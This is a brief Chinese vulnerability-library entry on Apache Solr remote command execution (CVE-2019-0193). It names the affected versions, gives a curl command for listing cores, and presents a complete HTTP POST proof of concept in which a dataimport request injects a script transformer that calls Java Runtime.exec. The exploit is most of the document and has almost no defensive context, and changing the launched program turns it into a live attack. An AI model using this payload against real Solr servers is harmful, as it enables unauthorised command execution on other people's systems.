---
title: 'Apache Solr远程命令执行 CVE-2019-0193'
date: Sat, 29 Aug 2020 11:09:52 +0000
draft: false
tags: ['白阁-漏洞库']
---

影响版本 apache solr 5.x-8.2.0,存在config API版本 获取所有 core 信息：curl [http://IP/solr/admin/cores](http://IP/solr/admin/cores) HTTP协议头：POST /solr//dataimport

POC

```
POST /solr/<your_core_name>/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Length: 763
User-Agent: Mozilla/5.0
Content-type: application/x-www-form-urlencoded
Connection: close

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=<your_core_name>&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"></dataSource>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" ></entity>
</document>
</dataConfig>
```

![](img/Apache Solr远程命令执行 CVE-2019-0193/123.png)